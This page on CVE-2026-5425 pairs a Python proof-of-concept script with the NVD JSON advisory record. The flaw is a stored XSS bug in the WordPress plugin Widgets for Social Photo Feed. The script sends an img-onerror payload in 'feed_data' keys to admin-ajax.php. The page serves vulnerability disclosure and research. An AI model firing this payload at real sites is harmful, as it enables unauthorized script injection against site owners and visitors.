CVE-2026-5425

import requests def exploit_cve_2026_5425(target_url): """ PoC for CVE-2026-5425: Stored XSS in WordPress Widgets for Social Photo Feed This script sends a malicious payload to the vulnerable endpoint. """ # The endpoint might vary depending on the plugin's AJAX handler url = f"{target_url}/wp-admin/admin-ajax.php" # Malicious payload injected into the keys of 'feed_data' # Using an img tag with onerror to trigger XSS payload_data = { "action": "some_plugin_action", # Replace with actual action name if known "feed_data": { "<img src=x onerror=alert('CVE-2026-5425-XSS')>": "value" } } headers = { "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (PoC Analyst)" } try: response = requests.post(url, data=payload_data, headers=headers, timeout=10) if response.status_code == 200: print("[+] Payload sent successfully.") print("[+] Check the admin dashboard for the XSS trigger.") else: print(f"[-] Request failed with status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": target = "http://example-wordpress-site.com" exploit_cve_2026_5425(target)

{"cve": {"id": "CVE-2026-5425", "sourceIdentifier": "[email protected]", "published": "2026-04-04T09:16:20.500", "lastModified": "2026-04-24T18:13:28.877", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Widgets for Social Photo Feed plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'feed_data' parameter keys in all versions up to, and including, 1.7.9 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset?old_path=social-photo-feed-widget/tags/1.7.8/social-photo-feed-widget.php&new_path=social-photo-feed-widget/tags/1.8/social-photo-feed-widget.php&old=3440215&new=3486529", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?old_path=social-photo-feed-widget/tags/1.7.8/trustindex-feed-plugin.class.php&new_path=social-photo-feed-widget/tags/1.8/trustindex-feed-plugin.class.php&old=3440215&new=3486529", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2584097a-8955-41c7-b009-c6502fe8b99b?source=cve", "source": "[email protected]"}]}}